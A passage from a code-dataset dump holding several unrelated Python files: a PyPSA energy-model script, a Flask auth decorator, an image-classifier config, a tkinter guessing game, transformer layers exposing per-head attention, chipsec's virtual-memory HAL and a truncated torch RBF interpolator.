-12], #BE\n [-10, 1], #UK\n ]\n \n pdiag.draw_network(n, spacing = 1, handle_bi = True, pos = None,\n bus_color = 'azure',\n filename = 'pypsa_diagram_3_2.svg')\n \nif should_bus_diagram:\n pdiag.draw_bus(n, 'Energy Island', bus_color = 'azure',\n handle_bi = True, link_line_length = 1.1,\n filename = 'bus_diagram1.svg')\n \n \n\n\n\n# t2 = pd.date_range('2030-01-01 00:00', '2030-01-07 00:00', freq = 'H')\n# ax = n.generators_t.p['Data'][t2].abs().plot(figsize = (15,5))\n# fig = plt.gcf()\n# ax.set_xlabel('Time [hr]')\n# ax.set_ylabel('Power consumed [MW]')\n# ax.set_title('Data')\n# fig.savefig('Data_timeseries.svg', format = 'svg', bbox_inches='tight')\n\n\n# Extra\n# linkz = n.links_t.p0\n\n# linkz2 = n.links[~n.links.index.str.contains(\"bus\")]\n\n# country = 'Denmark'\n# linkz_country = n.links[n.links.index.str.contains(country)]\n\n# linkz2['p_nom_opt'].hist(bins = 12, figsize = (10,5))\n# linkz2['p_nom_opt'].plot(figsize = (10,5))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"TheReal-Andrew/Masters_Thesis_NorthSeaEnergyIsland","sub_path":"test/full model test 1/model_test_1.py","file_name":"model_test_1.py","file_ext":"py","file_size_in_byte":10838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27735248370","text":"from functools import wraps\nfrom flask import request, jsonify, make_response\nfrom models.user import User\n\n\ndef auth_required(func):\n \"\"\"decorator for authenticating a user using token based authentication \"\"\"\n @wraps(func)\n def decorated_function(*args, **kwargs):\n \"\"\" Decorated function for authenticating a user\"\"\"\n response = {\n 'status': 'Failed',\n 'message': 'Invalid token'\n }\n code = 401\n\n auth_header = request.headers.get('Authorization')\n if not auth_header:\n auth_token = ''\n else:\n auth_token = auth_header.split(\" \")[1]\n subject = User.decode_auth_token(auth_token)\n if not auth_token or isinstance(resp, str):\n return make_response(jsonify(response)), code\n user = {'user_info': subject, 'auth_token': auth_token}\n return func(user, *args, **kwargs)\n return decorated_function\n","repo_name":"inno-asiimwe/questioner-flask","sub_path":"utils/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41823351428","text":"# inport necessary packages\nimport os\n\n# initialize the path to the *original* input directory of images\nORIG_INPUT_DATASET = \"training_images\"\n\nTRAIN_LABEL_PATH = \"training_labels.txt\"\n\n# initialize the base path to the *new* directory that will contain\n# our images after computing the training and testing split\nBASE_PATH = \"dataset\"\n\n# derive the training, validation, and testing directories\nTRAIN_PATH = os.path.sep.join([BASE_PATH, \"training\"])\nVAL_PATH = os.path.sep.join([BASE_PATH, \"validation\"])\nTEST_PATH = os.path.sep.join([BASE_PATH, \"evaluation\"])\n\n# for getting the order of images to output answer\nSAMPLE_ANSWER_PATH = os.path.sep.join([\"self_utils\", \"sample_answer.txt\"])\n\n# initialize the list of class label names\nCLASSES = []\nCLASS_NAMES_FILE = \"classes.txt\"\nwith open(CLASS_NAMES_FILE, \"r\") as f:\n for line in f:\n line = line[:-1] # remove the trailing \\n\n CLASSES.append(line)\n\n# build class directories for training and validation datasets\nfor split in (TRAIN_PATH, VAL_PATH):\n for labels in CLASSES:\n label_directory = 
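The auth_required decorator in the Flask record above has a name bug: the decoded token is bound to subject, but the validity test reads isinstance(resp, str), and resp is never defined, so every request through the decorator raises NameError. Assuming the common pattern where decode_auth_token returns an error string on failure and the token subject on success, the intended check is:

subject = User.decode_auth_token(auth_token)
# Test the name actually assigned above, not the undefined `resp`.
if not auth_token or isinstance(subject, str):
    return make_response(jsonify(response)), code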
os.path.sep.join([split, labels])\n if not os.path.exists(label_directory):\n print(\"[INFO] creating '{}' directory\".format(label_directory))\n os.makedirs(label_directory)\n\n\n# set the image size and shape\nIMG_SIZE = (480, 480)\nIMG_SHAPE = IMG_SIZE + (3, )\n\n# set the batch size\nBATCH_SIZE = 32\n\n# initialize our number of epochs, initial learning rate\nNUM_EPOCHS = 30\nINIT_LR = 1e-3\n\n# set the directory to save our trained model's weight\nWEIGHT_PATH = \"weightings\"\nif not os.path.exists(WEIGHT_PATH):\n print(\"[INFO] creating '{}' directory\".format(WEIGHT_PATH))\n os.makedirs(WEIGHT_PATH)\n\n# the name of base model\nBASE_MODEL_NAME = \"efficientnetv2-m-21k.h5\"\n\n# saving training model\nSAVE_MODEL1 = \"save_model1.h5\"\nSAVE_MODEL2 = \"save_model2.h5\"\n\n# the link and name of the final model .h5 file\nMODEL_URL = \"https://drive.google.com/u/0/uc?id=1-wnA207-0fuqKZMPL1r5lT_w9KqK2oKl&export=download\"\nMODEL_NAME = \"Enet_v2_finetuned_final.h5\"\n\n# file names for training histories\nHISTORY1 = \"history1.json\"\nHISTORY2 = \"history2.json\"\n","repo_name":"Lucas-Kuo/VR_DL_HW1","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38665124160","text":"import tkinter as tk\nimport random\n\n# 玩家要猜的数字\nnumber = random.randint(0, 1024)\nrunning = True\n# 猜的次数\nnum = 0\n# 提示猜测范围的最大数\nnmaxn = 1024\n# 提示猜测范围的最小数\nnminn = 0\n\n\n# \"关闭\"按钮事件函数\ndef eBtnClose(event):\n root.destroy()\n\n\n# \"猜\"按钮事件函数\ndef eBtnGuess(event):\n global nmaxn\n global nminn\n global num\n global running\n if running:\n # 获取猜的数字并转化为数字\n val_a = int(entry_a.get())\n if val_a == number:\n labelqval(\"恭喜答对了!\")\n num += 1\n running = False\n numGuess()\n elif val_a < number:\n # 猜小了\n if val_a > nminn:\n # 修改提示猜测范围的最小数\n nminn = val_a\n num += 1\n labelqval(\"小了哦,请输入\" + str(nminn) + \"到\" + str(nmaxn) + \"之间任意整数:\")\n else:\n if val_a < nmaxn:\n # 修改提示猜测范围的最大数\n nmaxn = val_a\n num += 1\n labelqval(\"大了哦,请输入\" + str(nminn) + \"到\" + str(nmaxn) + \"之间任意整数:\")\n else:\n labelqval(\"你已经答对啦。。。\")\n\n\ndef numGuess():\n if num == 1:\n labelqval(\"一次答对!\")\n elif num < 10:\n labelqval(\"==十次以内就答对了牛。。。 尝试次数:\" + str(num))\n else:\n labelqval(\"好吧,您都试了超过10v次了。。。 尝试次数:\" + str(num))\n\n\ndef labelqval(vText):\n # 修改提示标签文字\n label_val_q.config(label_val_q, text=vText)\n\n\nroot = tk.Tk()\nroot.geometry(\"400x90+200+200\")\nlabel_val_q = tk.Label(root, width=\"80\")\nlabel_val_q.pack(side=\"top\")\n\n# 单行输入文本框\nentry_a = tk.Entry(root, width=\"40\")\n# \"猜\"按钮\nbtnGuess = tk.Button(root, text=\"猜\")\nentry_a.pack(side=\"left\")\n# 绑定事件\nentry_a.bind(\"\", eBtnGuess)\nbtnGuess.bind(\"\", eBtnGuess)\nbtnGuess.pack(side=\"left\")\n# ”关闭按钮“\nbtnClose = tk.Button(root, text=\"关闭\")\nbtnClose.bind(\"\", eBtnClose)\nbtnClose.pack(side=\"left\")\nlabelqval(\"请输入0到1024之间的任意整数:\")\nentry_a.focus_set()\nprint(number)\nroot.mainloop()\n","repo_name":"beiyuanqian/python_learning","sub_path":"python_projectcase/1-28.1.py","file_name":"1-28.1.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5131108029","text":"import logging\nimport math\nfrom typing import Optional, Tuple\nimport warnings\nimport torch\nfrom collections import defaultdict\nfrom torch import Tensor, nn\nfrom torch.nn import functional as F\nfrom torch.nn.modules import TransformerDecoder as 
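In the tkinter guessing game above, labelqval() calls label_val_q.config(label_val_q, text=vText), passing the widget into its own bound config(); that extra positional argument looks like a leftover from the unbound Label.config(widget, ...) calling style and should simply be dropped:

def labelqval(vText):
    # Update the prompt label; the bound config() call needs only keywords.
    label_val_q.config(text=vText)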
OrgTransformerDecoder\nfrom torch.nn.modules import TransformerDecoderLayer as OrgTransformerDecoderLayer\nfrom torch.nn.modules.activation import MultiheadAttention\nfrom torch.nn.functional import _scaled_dot_product_attention, _in_projection_packed, _in_projection, linear\nfrom torch.overrides import (has_torch_function, handle_torch_function)\n\nlogger = logging.getLogger(__name__)\n\nBOS, EOS, PAD, MASK = '[BOS]', '[EOS]', '[PAD]', '[MASK]'\n\n\ndef multi_head_attention_forward(\n query: Tensor,\n key: Tensor,\n value: Tensor,\n embed_dim_to_check: int,\n num_heads: int,\n in_proj_weight: Tensor,\n in_proj_bias: Optional[Tensor],\n bias_k: Optional[Tensor],\n bias_v: Optional[Tensor],\n add_zero_attn: bool,\n dropout_p: float,\n out_proj_weight: Tensor,\n out_proj_bias: Optional[Tensor],\n training: bool = True,\n key_padding_mask: Optional[Tensor] = None,\n need_weights: bool = True,\n attn_mask: Optional[Tensor] = None,\n use_separate_proj_weight: bool = False,\n q_proj_weight: Optional[Tensor] = None,\n k_proj_weight: Optional[Tensor] = None,\n v_proj_weight: Optional[Tensor] = None,\n static_k: Optional[Tensor] = None,\n static_v: Optional[Tensor] = None,\n) -> Tuple[Tensor, Optional[Tensor]]:\n '''\n Modified from the pytorch source so that it can output the attention weights of multiple heads instead of the average.\n '''\n\n tens_ops = (query, key, value, in_proj_weight, in_proj_bias, bias_k,\n bias_v, out_proj_weight, out_proj_bias)\n if has_torch_function(tens_ops):\n return handle_torch_function(\n multi_head_attention_forward,\n tens_ops,\n query,\n key,\n value,\n embed_dim_to_check,\n num_heads,\n in_proj_weight,\n in_proj_bias,\n bias_k,\n bias_v,\n add_zero_attn,\n dropout_p,\n out_proj_weight,\n out_proj_bias,\n training=training,\n key_padding_mask=key_padding_mask,\n need_weights=need_weights,\n attn_mask=attn_mask,\n use_separate_proj_weight=use_separate_proj_weight,\n q_proj_weight=q_proj_weight,\n k_proj_weight=k_proj_weight,\n v_proj_weight=v_proj_weight,\n static_k=static_k,\n static_v=static_v,\n )\n\n # set up shape vars\n tgt_len, bsz, embed_dim = query.shape\n src_len, _, _ = key.shape\n assert embed_dim == embed_dim_to_check, \\\n f\"was expecting embedding dimension of {embed_dim_to_check}, but got {embed_dim}\"\n if isinstance(embed_dim, torch.Tensor):\n # embed_dim can be a tensor when JIT tracing\n head_dim = embed_dim.div(num_heads, rounding_mode='trunc')\n else:\n head_dim = embed_dim // num_heads\n assert head_dim * \\\n num_heads == embed_dim, f\"embed_dim {embed_dim} not divisible by num_heads {num_heads}\"\n if use_separate_proj_weight:\n # allow MHA to have different embedding dimensions when separate projection weights are used\n assert key.shape[:2] == value.shape[:2], \\\n f\"key's sequence and batch dims {key.shape[:2]} do not match value's {value.shape[:2]}\"\n else:\n assert key.shape == value.shape, f\"key shape {key.shape} does not match value shape {value.shape}\"\n\n #\n # compute in-projection\n #\n if not use_separate_proj_weight:\n q, k, v = _in_projection_packed(query, key, value, in_proj_weight,\n in_proj_bias)\n else:\n assert q_proj_weight is not None, \"use_separate_proj_weight is True but q_proj_weight is None\"\n assert k_proj_weight is not None, \"use_separate_proj_weight is True but k_proj_weight is None\"\n assert v_proj_weight is not None, \"use_separate_proj_weight is True but v_proj_weight is None\"\n if in_proj_bias is None:\n b_q = b_k = b_v = None\n else:\n b_q, b_k, b_v = in_proj_bias.chunk(3)\n q, k, v = 
_in_projection(query, key, value, q_proj_weight,\n k_proj_weight, v_proj_weight, b_q, b_k, b_v)\n\n # prep attention mask\n if attn_mask is not None:\n if attn_mask.dtype == torch.uint8:\n warnings.warn(\n \"Byte tensor for attn_mask in nn.MultiheadAttention is deprecated. Use bool tensor instead.\"\n )\n attn_mask = attn_mask.to(torch.bool)\n else:\n assert attn_mask.is_floating_point() or attn_mask.dtype == torch.bool, \\\n f\"Only float, byte, and bool types are supported for attn_mask, not {attn_mask.dtype}\"\n # ensure attn_mask's dim is 3\n if attn_mask.dim() == 2:\n correct_2d_size = (tgt_len, src_len)\n if attn_mask.shape != correct_2d_size:\n raise RuntimeError(\n f\"The shape of the 2D attn_mask is {attn_mask.shape}, but should be {correct_2d_size}.\"\n )\n attn_mask = attn_mask.unsqueeze(0)\n elif attn_mask.dim() == 3:\n correct_3d_size = (bsz * num_heads, tgt_len, src_len)\n if attn_mask.shape != correct_3d_size:\n raise RuntimeError(\n f\"The shape of the 3D attn_mask is {attn_mask.shape}, but should be {correct_3d_size}.\"\n )\n else:\n raise RuntimeError(\n f\"attn_mask's dimension {attn_mask.dim()} is not supported\")\n\n # prep key padding mask\n if key_padding_mask is not None and key_padding_mask.dtype == torch.uint8:\n warnings.warn(\n \"Byte tensor for key_padding_mask in nn.MultiheadAttention is deprecated. Use bool tensor instead.\"\n )\n key_padding_mask = key_padding_mask.to(torch.bool)\n\n # add bias along batch dimension (currently second)\n if bias_k is not None and bias_v is not None:\n assert static_k is None, \"bias cannot be added to static key.\"\n assert static_v is None, \"bias cannot be added to static value.\"\n k = torch.cat([k, bias_k.repeat(1, bsz, 1)])\n v = torch.cat([v, bias_v.repeat(1, bsz, 1)])\n if attn_mask is not None:\n attn_mask = pad(attn_mask, (0, 1))\n if key_padding_mask is not None:\n key_padding_mask = pad(key_padding_mask, (0, 1))\n else:\n assert bias_k is None\n assert bias_v is None\n\n #\n # reshape q, k, v for multihead attention and make em batch first\n #\n q = q.contiguous().view(tgt_len, bsz * num_heads, head_dim).transpose(0, 1)\n if static_k is None:\n k = k.contiguous().view(k.shape[0], bsz * num_heads,\n head_dim).transpose(0, 1)\n else:\n # TODO finish disentangling control flow so we don't do in-projections when statics are passed\n assert static_k.size(0) == bsz * num_heads, \\\n f\"expecting static_k.size(0) of {bsz * num_heads}, but got {static_k.size(0)}\"\n assert static_k.size(2) == head_dim, \\\n f\"expecting static_k.size(2) of {head_dim}, but got {static_k.size(2)}\"\n k = static_k\n if static_v is None:\n v = v.contiguous().view(v.shape[0], bsz * num_heads,\n head_dim).transpose(0, 1)\n else:\n # TODO finish disentangling control flow so we don't do in-projections when statics are passed\n assert static_v.size(0) == bsz * num_heads, \\\n f\"expecting static_v.size(0) of {bsz * num_heads}, but got {static_v.size(0)}\"\n assert static_v.size(2) == head_dim, \\\n f\"expecting static_v.size(2) of {head_dim}, but got {static_v.size(2)}\"\n v = static_v\n\n # add zero attention along batch dimension (now first)\n if add_zero_attn:\n zero_attn_shape = (bsz * num_heads, 1, head_dim)\n k = torch.cat(\n [k,\n torch.zeros(zero_attn_shape, dtype=k.dtype, device=k.device)],\n dim=1)\n v = torch.cat(\n [v,\n torch.zeros(zero_attn_shape, dtype=v.dtype, device=v.device)],\n dim=1)\n if attn_mask is not None:\n attn_mask = pad(attn_mask, (0, 1))\n if key_padding_mask is not None:\n key_padding_mask = pad(key_padding_mask, (0, 
1))\n\n # update source sequence length after adjustments\n src_len = k.size(1)\n\n # merge key padding and attention masks\n if key_padding_mask is not None:\n assert key_padding_mask.shape == (bsz, src_len), \\\n f\"expecting key_padding_mask shape of {(bsz, src_len)}, but got {key_padding_mask.shape}\"\n key_padding_mask = key_padding_mask.view(bsz, 1, 1, src_len). \\\n expand(-1, num_heads, -1, -1).reshape(bsz * num_heads, 1, src_len)\n if attn_mask is None:\n attn_mask = key_padding_mask\n elif attn_mask.dtype == torch.bool:\n attn_mask = attn_mask.logical_or(key_padding_mask)\n else:\n attn_mask = attn_mask.masked_fill(key_padding_mask, float(\"-inf\"))\n\n # convert mask to float\n if attn_mask is not None and attn_mask.dtype == torch.bool:\n new_attn_mask = torch.zeros_like(attn_mask, dtype=torch.float)\n new_attn_mask.masked_fill_(attn_mask, float(\"-inf\"))\n attn_mask = new_attn_mask\n\n # adjust dropout probability\n if not training:\n dropout_p = 0.0\n\n #\n # (deep breath) calculate attention and out projection\n #\n attn_output, attn_output_weights = _scaled_dot_product_attention(\n q, k, v, attn_mask, dropout_p)\n attn_output = attn_output.transpose(0, 1).contiguous().view(\n tgt_len, bsz, embed_dim)\n attn_output = linear(attn_output, out_proj_weight, out_proj_bias)\n\n if need_weights:\n # output the attention weights for each head.\n attn_output_weights = attn_output_weights.view(bsz, num_heads, tgt_len,\n src_len)\n return attn_output, attn_output_weights\n else:\n return attn_output, None\n\n\nclass MultiheadAttention(MultiheadAttention):\n\n def forward(\n self,\n query: Tensor,\n key: Tensor,\n value: Tensor,\n key_padding_mask: Optional[Tensor] = None,\n need_weights: bool = True,\n attn_mask: Optional[Tensor] = None\n ) -> Tuple[Tensor, Optional[Tensor]]:\n\n if self.batch_first:\n query, key, value = [\n x.transpose(1, 0) for x in (query, key, value)\n ]\n\n if not self._qkv_same_embed_dim:\n attn_output, attn_output_weights = multi_head_attention_forward(\n query,\n key,\n value,\n self.embed_dim,\n self.num_heads,\n self.in_proj_weight,\n self.in_proj_bias,\n self.bias_k,\n self.bias_v,\n self.add_zero_attn,\n self.dropout,\n self.out_proj.weight,\n self.out_proj.bias,\n training=self.training,\n key_padding_mask=key_padding_mask,\n need_weights=need_weights,\n attn_mask=attn_mask,\n use_separate_proj_weight=True,\n q_proj_weight=self.q_proj_weight,\n k_proj_weight=self.k_proj_weight,\n v_proj_weight=self.v_proj_weight)\n else:\n attn_output, attn_output_weights = multi_head_attention_forward(\n query,\n key,\n value,\n self.embed_dim,\n self.num_heads,\n self.in_proj_weight,\n self.in_proj_bias,\n self.bias_k,\n self.bias_v,\n self.add_zero_attn,\n self.dropout,\n self.out_proj.weight,\n self.out_proj.bias,\n training=self.training,\n key_padding_mask=key_padding_mask,\n need_weights=need_weights,\n attn_mask=attn_mask)\n if self.batch_first:\n return attn_output.transpose(1, 0), attn_output_weights\n else:\n return attn_output, attn_output_weights\n\n\nclass TransformerDecoderLayer(OrgTransformerDecoderLayer):\n\n def __init__(self,\n d_model,\n nhead,\n dim_feedforward=2048,\n dropout=0.1,\n activation=F.relu,\n layer_norm_eps=0.00001,\n batch_first=False,\n norm_first=False,\n device=None,\n dtype=None,\n output_attention=False) -> None:\n\n self.output_attention = output_attention\n # self.attention_weights = []\n factory_kwargs = {'device': device, 'dtype': dtype}\n super().__init__(d_model, nhead, dim_feedforward, dropout, activation,\n layer_norm_eps, 
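The net effect of the overridden forward above: with need_weights=True the module returns per-head attention maps of shape (batch, num_heads, tgt_len, src_len), where the stock torch.nn.MultiheadAttention of this PyTorch vintage averages over heads down to (batch, tgt_len, src_len). A hypothetical usage:

# attn_out, weights = mha(query, key, value, need_weights=True)
# weights.shape   -> (batch, num_heads, tgt_len, src_len)
# weights[:, 0]   -> the attention map of head 0 alone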
batch_first, norm_first, device,\n dtype)\n self.multihead_attn = MultiheadAttention(d_model,\n nhead,\n dropout=dropout,\n batch_first=batch_first,\n **factory_kwargs)\n self.self_attn = MultiheadAttention(d_model,\n nhead,\n dropout=dropout,\n batch_first=batch_first,\n **factory_kwargs)\n\n def forward(self,\n tgt: Tensor,\n memory: Tensor,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n\n x = tgt\n if self.norm_first:\n sa_block_x, sa_block_attention = self._sa_block(self.norm1(x), tgt_mask,\n tgt_key_padding_mask)\n x = x + sa_block_x\n mha_block_x, mha_block_attention = self._mha_block(\n self.norm2(x), memory, memory_mask, memory_key_padding_mask)\n # x = x + self._mha_block(self.norm2(x), memory, memory_mask, memory_key_padding_mask)\n x = x + mha_block_x\n x = x + self._ff_block(self.norm3(x))\n else:\n sa_block_x, sa_block_attention = self._sa_block(x, tgt_mask, tgt_key_padding_mask)\n x = self.norm1(x + sa_block_x)\n mha_block_x, mha_block_attention = self._mha_block(\n x, memory, memory_mask, memory_key_padding_mask)\n # x = self.norm2(x + self._mha_block(x, memory, memory_mask, memory_key_padding_mask))\n x = self.norm2(x + mha_block_x)\n x = self.norm3(x + self._ff_block(x))\n\n return x, {'cross_attn':mha_block_attention, 'decoder_self_attn': sa_block_attention}\n \n # self-attention block\n def _sa_block(self, x: Tensor,\n attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n x, attention_weight = self.self_attn(x, x, x,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=self.output_attention)\n return self.dropout1(x), attention_weight\n\n # multihead attention block\n def _mha_block(self, x: Tensor, mem: Tensor, attn_mask: Optional[Tensor],\n key_padding_mask: Optional[Tensor]) -> Tensor:\n x, attention_weight = self.multihead_attn(\n x,\n mem,\n mem,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=self.output_attention)\n\n return self.dropout2(x), attention_weight\n\n\nclass TransformerDecoder(OrgTransformerDecoder):\n\n def __init__(self,\n decoder_layer,\n num_layers,\n norm=None,\n output_attention=False):\n self.output_attention = output_attention\n super().__init__(decoder_layer, num_layers, norm)\n\n def forward(self,\n tgt: Tensor,\n memory: Tensor,\n tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n\n output = tgt\n self.attention_weights = defaultdict(list)\n\n for mod in self.layers:\n output, attn_dict = mod(\n output,\n memory,\n tgt_mask=tgt_mask,\n memory_mask=memory_mask,\n tgt_key_padding_mask=tgt_key_padding_mask,\n memory_key_padding_mask=memory_key_padding_mask)\n if self.output_attention:\n for key in attn_dict:\n self.attention_weights[key].append(attn_dict[key])\n\n if self.norm is not None:\n output = self.norm(output)\n if self.output_attention:\n return output, self.attention_weights\n else:\n return output, None\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, emb_size: int, dropout: float, maxlen: int = 5000):\n super(PositionalEncoding, self).__init__()\n den = torch.exp(-torch.arange(0, emb_size, 2) * math.log(10000) /\n emb_size)\n pos = torch.arange(0, maxlen).reshape(maxlen, 1)\n pos_embedding = torch.zeros((maxlen, emb_size))\n pos_embedding[:, 0::2] = torch.sin(pos * 
den)\n pos_embedding[:, 1::2] = torch.cos(pos * den)\n pos_embedding = pos_embedding.unsqueeze(-2)\n\n self.dropout = nn.Dropout(dropout)\n self.register_buffer('pos_embedding', pos_embedding)\n\n def forward(self, token_embedding: Tensor):\n return self.dropout(token_embedding +\n self.pos_embedding[:token_embedding.size(0), :])\n\n\n# helper Module to convert tensor of input indices into corresponding tensor of token embeddings\n\n\nclass TokenEmbedding(nn.Module):\n\n def __init__(self, vocab_size: int, emb_size):\n super(TokenEmbedding, self).__init__()\n self.embedding = nn.Embedding(vocab_size, emb_size)\n self.emb_size = emb_size\n\n def forward(self, tokens: Tensor):\n return self.embedding(tokens.long()) * math.sqrt(self.emb_size)\n","repo_name":"wangxr0526/Parrot","sub_path":"models/model_layer.py","file_name":"model_layer.py","file_ext":"py","file_size_in_byte":18856,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"2085428162","text":"import struct\nfrom typing import Tuple\nfrom chipsec.logger import logger, print_buffer_bytes\nfrom chipsec.hal import hal_base\n\n\nclass VirtMemory(hal_base.HALBase):\n def __init__(self, cs):\n super(VirtMemory, self).__init__(cs)\n self.helper = cs.helper\n\n ####################################################################################\n #\n # virtual memory API using 64b virtual Address\n # (Same functions as below just using 64b PA instead of High and Low 32b parts of PA)\n #\n ####################################################################################\n\n # Reading virtual memory\n\n def read_virtual_mem(self, virt_address: int, length: int) -> int:\n logger().log_hal(f'[mem] 0x{virt_address:016X}')\n phys_address = self.va2pa(virt_address)\n return self.helper.read_phys_mem(phys_address, length)\n\n def read_virtual_mem_dword(self, virt_address: int) -> int:\n phys_address = self.va2pa(virt_address)\n out_buf = self.helper.read_phys_mem(phys_address, 4)\n value = struct.unpack('=I', out_buf)[0]\n logger().log_hal(f'[mem] dword at VA = 0x{virt_address:016X}: 0x{value:08X}')\n return value\n\n def read_virtual_mem_word(self, virt_address: int) -> int:\n phys_address = self.va2pa(virt_address)\n out_buf = self.helper.read_phys_mem(phys_address, 2)\n value = struct.unpack('=H', out_buf)[0]\n logger().log_hal(f'[mem] word at VA = 0x{virt_address:016X}: 0x{value:04X}')\n return value\n\n def read_virtual_mem_byte(self, virt_address: int) -> int:\n phys_address = self.va2pa(virt_address)\n out_buf = self.helper.read_phys_mem(phys_address, 1)\n value = struct.unpack('=B', out_buf)[0]\n logger().log_hal(f'[mem] byte at VA = 0x{virt_address:016X}: 0x{value:02X}')\n return value\n\n # Writing virtual memory\n\n def write_virtual_mem(self, virt_address: int, length: int, buf: bytes) -> int:\n logger().log_hal(f'[mem] buffer len = 0x{length:X} to VA = 0x{virt_address:016X}')\n if logger().HAL:\n print_buffer_bytes(buf)\n phys_address = self.va2pa(virt_address)\n return self.helper.write_phys_mem(phys_address, length, buf)\n\n def write_virtual_mem_dword(self, virt_address: int, dword_value: int) -> int:\n logger().log_hal(f'[mem] dword to VA = 0x{virt_address:016X} <- 0x{dword_value:08X}')\n phys_address = self.va2pa(virt_address)\n return self.helper.write_phys_mem(phys_address, 4, struct.pack('I', dword_value))\n\n def write_virtual_mem_word(self, virt_address: int, word_value: int) -> int:\n logger().log_hal(f'[mem] word to VA = 0x{virt_address:016X} <- 
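For reference, the den/pos construction in PositionalEncoding above is the sinusoidal scheme from "Attention Is All You Need":

# den = exp(-(2i) * ln(10000) / emb_size) = 1 / 10000**(2i / emb_size)
# so: pos_embedding[pos, 2i]   = sin(pos / 10000**(2i / emb_size))
#     pos_embedding[pos, 2i+1] = cos(pos / 10000**(2i / emb_size))
# and TokenEmbedding scales by sqrt(emb_size) so token and positional
# magnitudes stay comparable before the dropout-wrapped sum.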
0x{word_value:04X}')\n phys_address = self.va2pa(virt_address)\n return self.helper.write_phys_mem(phys_address, 2, struct.pack('H', word_value))\n\n def write_virtual_mem_byte(self, virt_address: int, byte_value: int) -> int:\n logger().log_hal(f'[mem] byte to VA = 0x{virt_address:016X} <- 0x{byte_value:02X}')\n phys_address = self.va2pa(virt_address)\n return self.helper.write_phys_mem(phys_address, 1, struct.pack('B', byte_value))\n\n # Allocate virtual memory buffer\n\n def alloc_virtual_mem(self, length: int, max_phys_address: int = 0xFFFFFFFFFFFFFFFF) -> Tuple[int, int]:\n (va, pa) = self.helper.alloc_phys_mem(length, max_phys_address)\n logger().log_hal(f'[mem] Allocated: PA = 0x{pa:016X}, VA = 0x{va:016X}')\n return (va, pa)\n\n def va2pa(self, va: int) -> int:\n (pa, error_code) = self.helper.va2pa(va)\n if error_code:\n logger().log_hal(f'[mem] Looks like VA (0x{va:016X}) not mapped')\n return va\n logger().log_hal(f'[mem] VA (0x{va:016X}) -> PA (0x{pa:016X})')\n return pa\n\n def free_virtual_mem(self, virt_address: int) -> bool:\n pa = self.va2pa(virt_address)\n ret = self.helper.free_phys_mem(pa)\n logger().log_hal(f'[mem] Deallocated : VA = 0x{virt_address:016X}')\n return ret == 1\n","repo_name":"chipsec/chipsec","sub_path":"chipsec/hal/virtmem.py","file_name":"virtmem.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":2755,"dataset":"github-code","pt":"19"} +{"seq_id":"19699989397","text":"from sklearn.base import BaseEstimator\nfrom sklearn.preprocessing import StandardScaler\n\nimport torch\n\n\n@torch.jit.script\ndef cdist(x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n \"\"\"\n euclidean distance matrix\n -------------------\n equivalent to:\n from scipy.spatial.distance import cdist\n cdist(X, X, 'euclidean')\n \"\"\"\n return torch.cdist(x, y, p=2.0, compute_mode=\"use_mm_for_euclid_dist\")\n\n\n@torch.jit.script\ndef linear_kernel(\n x: torch.Tensor,\n y: torch.Tensor,\n epsilon: float,\n) -> torch.Tensor:\n D_ij = cdist(x, y)\n return D_ij\n\n\n@torch.jit.script\ndef gaussian_kernel(\n x: torch.Tensor,\n y: torch.Tensor,\n epsilon: float,\n) -> torch.Tensor:\n D_ij = cdist(x, y)\n return torch.exp(-D_ij / (2 * epsilon ** 2))\n\n\nclass Nyx(BaseEstimator):\n \"\"\"\n Torch accelerated scikit-learn friendly RBF interpolation\n \"\"\"\n\n def __init__(\n self,\n x_scaler=StandardScaler(),\n y_scaler=StandardScaler(),\n kernel=linear_kernel,\n epsilon=None,\n device=torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\"),\n ):\n self.x_scaler = x_scaler\n self.y_scaler = y_scaler\n self.kernel = kernel\n self.epsilon = epsilon\n self.device = device\n\n def _to_tensor(self, array, dtype=torch.float64):\n return torch.as_tensor(array, dtype=dtype).to(self.device)\n\n def _setfit(self, X, y):\n self.y = self._to_tensor(\n self.y_scaler.fit_transform(y.reshape(-1, 1)).reshape(\n -1,\n )\n )\n self.X = self._to_tensor(self.x_scaler.fit_transform(X))\n if self.epsilon is None:\n xyt = self.X.T\n # default epsilon is the \"the average distance between nodes\" based on a bounding hypercube\n ximax = torch.amax(xyt, axis=1)\n ximin = torch.amin(xyt, axis=1)\n edges = ximax - ximin\n edges = edges[torch.nonzero(edges)]\n self.epsilon = torch.pow(\n torch.prod(edges) / xyt.shape[-1], 1.0 / edges.size(0)\n )\n\n def fit(self, X, y):\n self._setfit(X=X, y=y)\n # Kernel distances between observations\n self.internal_dist = self.kernel(self.X, self.X, epsilon=self.epsilon)\n # Solve for weights such that distance 
